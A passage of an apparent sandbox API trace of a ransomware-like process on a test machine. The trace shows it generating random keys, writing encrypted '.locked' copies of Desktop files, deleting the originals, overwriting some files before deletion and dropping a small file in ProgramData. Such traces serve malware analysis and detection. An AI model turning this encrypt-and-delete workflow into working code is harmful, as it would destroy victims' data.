(hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.316] SetEvent (hEvent=0x190) returned 1 [0259.316] SetEvent (hEvent=0x104) returned 1 [0259.316] SetEvent (hEvent=0x134) returned 1 [0259.316] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.437] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0259.437] SetEvent (hEvent=0x150) returned 1 [0259.437] SetEvent (hEvent=0x134) returned 1 [0259.456] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0259.499] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.499] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0259.499] SetEvent (hEvent=0x134) returned 1 [0259.501] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0259.534] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.534] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0259.548] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.548] SetEvent (hEvent=0x104) returned 1 [0259.548] SetEvent (hEvent=0x190) returned 1 [0259.548] SetEvent (hEvent=0x184) returned 1 [0259.548] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.641] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0259.641] SetEvent (hEvent=0x150) returned 1 [0259.641] SetEvent (hEvent=0x184) returned 1 [0259.644] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ZH5t5F Pn3U-oGq.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zh5t5f pn3u-ogq.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0259.654] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12637e88 | out: lpMode=0x12637e88) returned 0 [0259.654] WriteFile (in: hFile=0x180, lpBuffer=0x12ad6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12637e78, lpOverlapped=0x0 | out: lpBuffer=0x12ad6000*, lpNumberOfBytesWritten=0x12637e78*=0xfa000, lpOverlapped=0x0) returned 1 [0259.698] CloseHandle (hObject=0x180) returned 1 [0259.748] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.839] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.889] SetEvent (hEvent=0x190) returned 1 [0259.889] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.943] SetEvent (hEvent=0x190) returned 1 [0259.943] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0259.985] SetEvent (hEvent=0x190) returned 1 [0259.985] SetEvent (hEvent=0x184) returned 1 [0259.985] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.986] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x12635a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12635a24*=0xa) returned 1 [0260.055] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0260.155] SetEvent (hEvent=0x190) returned 1 [0260.155] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0260.198] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0260.376] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ZH5t5F Pn3U-oGq.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zh5t5f pn3u-ogq.mp4")) returned 1 [0260.650] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x12659a24*=0xb) returned 1 [0260.657] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\dda kMB.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dda kmb.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0260.657] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0260.657] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\dda kMB.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dda kmb.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0261.055] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0261.252] GetConsoleMode (in: hConsoleHandle=0x204, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0261.252] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0261.843] SetEvent (hEvent=0x21c) returned 1 [0261.844] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0261.847] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0261.988] SetEvent (hEvent=0x1b8) returned 1 [0262.083] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0263.026] SetEvent (hEvent=0x12c) returned 1 [0263.026] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0263.033] SetEvent (hEvent=0x20c) returned 1 [0263.033] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0263.146] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0263.158] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PuTjWyxTe.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\putjwyxte.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0263.158] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0263.158] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PuTjWyxTe.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\putjwyxte.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0265.050] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0265.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0265.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0265.050] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0265.050] WriteFile (in: hFile=0x19c, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0265.054] ReadFile (in: hFile=0x1c8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a3d68*=0x105da, lpOverlapped=0x0) returned 1 [0265.058] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x105da, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x123a3d74*=0x105da, lpOverlapped=0x0) returned 1 [0265.444] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0266.041] ReadFile (in: hFile=0x1c8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0266.062] CloseHandle (hObject=0x19c) returned 1 [0266.067] CloseHandle (hObject=0x1c8) returned 1 [0266.067] SetEvent (hEvent=0x134) returned 1 [0266.067] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0266.346] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0268.853] SetEvent (hEvent=0x1d0) returned 1 [0268.853] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\7qqVU2GatTMCj 1dpl.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7qqvu2gattmcj 1dpl.mkv")) returned 1 [0269.418] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0269.710] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12635a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12635a24*=0xb) returned 1 [0269.802] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ivion.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ivion.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0269.803] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0269.803] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ivion.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ivion.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0270.259] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0270.413] SetEvent (hEvent=0x150) returned 1 [0270.413] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12635d9c | out: lpMode=0x12635d9c) returned 0 [0270.413] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0272.913] SetEvent (hEvent=0x20c) returned 1 [0272.913] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0272.937] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.164] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0273.173] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0273.173] SetEvent (hEvent=0x150) returned 1 [0273.173] SetEvent (hEvent=0x1d0) returned 1 [0273.173] SetEvent (hEvent=0x20c) returned 1 [0273.174] SetEvent (hEvent=0x134) returned 1 [0273.174] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0273.188] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.189] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0273.219] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.219] SetEvent (hEvent=0x12c) returned 1 [0273.219] SetEvent (hEvent=0x134) returned 1 [0273.219] SetEvent (hEvent=0x20c) returned 1 [0273.219] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.254] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0273.254] SetEvent (hEvent=0x150) returned 1 [0273.254] SetEvent (hEvent=0x12c) returned 1 [0273.254] SetEvent (hEvent=0x134) returned 1 [0273.254] SetEvent (hEvent=0x20c) returned 1 [0273.254] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\QnyUe3Ugz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qnyue3ugz.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0273.270] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0273.270] WriteFile (in: hFile=0x1f8, lpBuffer=0x15fb6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x15fb6000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0273.316] CloseHandle (hObject=0x1f8) returned 1 [0273.427] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\QnyUe3Ugz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qnyue3ugz.swf")) returned 1 [0273.485] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.625] SetEvent (hEvent=0x1b8) returned 1 [0273.625] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0273.635] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0274.436] SetEvent (hEvent=0x1d0) returned 1 [0274.436] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0274.459] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0274.663] SetEvent (hEvent=0x20c) returned 1 [0274.663] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.033] SetEvent (hEvent=0x220) returned 1 [0276.033] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.040] SetEvent (hEvent=0x1ac) returned 1 [0276.040] SetEvent (hEvent=0x1dc) returned 1 [0276.040] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.127] SetEvent (hEvent=0x12c) returned 1 [0276.127] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.318] SetEvent (hEvent=0x184) returned 1 [0276.318] SetEvent (hEvent=0x1d0) returned 1 [0276.320] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.445] SetEvent (hEvent=0x184) returned 1 [0276.445] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.625] SetEvent (hEvent=0x190) returned 1 [0276.625] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0276.851] SetEvent (hEvent=0x20c) returned 1 [0276.851] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0277.248] SetEvent (hEvent=0x184) returned 1 [0277.248] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0277.304] SetEvent (hEvent=0x1dc) returned 1 [0277.304] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0277.360] SetEvent (hEvent=0x134) returned 1 [0277.489] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0277.847] SetEvent (hEvent=0x214) returned 1 [0277.847] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0280.092] SetEvent (hEvent=0x12c) returned 1 [0280.092] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0280.198] SetEvent (hEvent=0x198) returned 1 [0280.198] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0280.204] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0280.204] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0280.254] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0280.254] SetEvent (hEvent=0x1d0) returned 1 [0280.254] SetEvent (hEvent=0x1ac) returned 1 [0280.254] SetEvent (hEvent=0x21c) returned 1 [0280.254] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0280.321] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0280.321] SetEvent (hEvent=0x150) returned 1 [0280.321] SetEvent (hEvent=0x21c) returned 1 [0280.321] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\_2Qs2D.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\_2qs2d.odp")) returned 1 [0280.640] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0282.353] SetEvent (hEvent=0x104) returned 1 [0282.353] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0282.401] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.414] SetEvent (hEvent=0x220) returned 1 [0283.414] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.563] SetEvent (hEvent=0x190) returned 1 [0283.563] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0283.586] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.586] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0283.597] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.597] SetEvent (hEvent=0x21c) returned 1 [0283.597] SetEvent (hEvent=0x12c) returned 1 [0283.597] SetEvent (hEvent=0x214) returned 1 [0283.597] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.684] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0283.684] SetEvent (hEvent=0x150) returned 1 [0283.685] SetEvent (hEvent=0x12c) returned 1 [0283.685] SetEvent (hEvent=0x214) returned 1 [0283.685] SetEvent (hEvent=0x21c) returned 1 [0283.685] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\dbMm7g.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\dbmm7g.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0283.688] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0283.688] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\dbMm7g.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\dbmm7g.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0283.689] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0283.689] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0283.689] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0283.689] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0283.689] WriteFile (in: hFile=0x228, lpBuffer=0x126ac000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x126ac000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0283.693] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0283.701] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0283.701] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0283.701] SetEvent (hEvent=0x214) returned 1 [0283.701] SetEvent (hEvent=0x21c) returned 1 [0283.701] SetEvent (hEvent=0x12c) returned 1 [0283.701] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1265bd68*=0xaa2d, lpOverlapped=0x0) returned 1 [0283.703] WriteFile (in: hFile=0x228, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0xaa2d, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x1265bd74*=0xaa2d, lpOverlapped=0x0) returned 1 [0283.780] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0284.017] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0284.018] CloseHandle (hObject=0x228) returned 1 [0284.022] CloseHandle (hObject=0x1e0) returned 1 [0284.022] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0284.022] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0284.022] WriteFile (in: hFile=0x1e0, lpBuffer=0x1264a200*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x1264a200*, lpNumberOfBytesWritten=0x1265be64*=0x40, lpOverlapped=0x0) returned 1 [0284.023] CloseHandle (hObject=0x1e0) returned 1 [0284.024] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\dbMm7g.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\dbmm7g.png")) returned 1 [0284.365] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0284.497] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0284.506] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0284.561] SetEvent (hEvent=0x214) returned 1 [0284.561] SetEvent (hEvent=0x190) returned 1 [0284.561] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0284.943] SetEvent (hEvent=0x214) returned 1 [0284.943] SetEvent (hEvent=0x184) returned 1 [0284.943] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0285.003] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0285.146] SetEvent (hEvent=0x1b8) returned 1 [0285.146] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0285.218] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\dbMm7g.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\dbmm7g.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0286.659] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0287.374] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1249de88 | out: lpMode=0x1249de88) returned 0 [0287.374] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0287.811] SetEvent (hEvent=0x20c) returned 1 [0287.812] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0289.710] SetEvent (hEvent=0x1b8) returned 1 [0289.710] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0289.774] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0289.824] SetEvent (hEvent=0x1b8) returned 1 [0289.824] SetEvent (hEvent=0x134) returned 1 [0289.824] SetEvent (hEvent=0x12c) returned 1 [0289.824] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0292.992] SetEvent (hEvent=0x22c) returned 1 [0292.992] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0293.048] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0293.048] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0293.064] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0293.064] SetEvent (hEvent=0x134) returned 1 [0293.064] SetEvent (hEvent=0x12c) returned 1 [0293.064] SetEvent (hEvent=0x104) returned 1 [0293.064] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0293.159] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0293.159] SetEvent (hEvent=0x150) returned 1 [0293.159] SetEvent 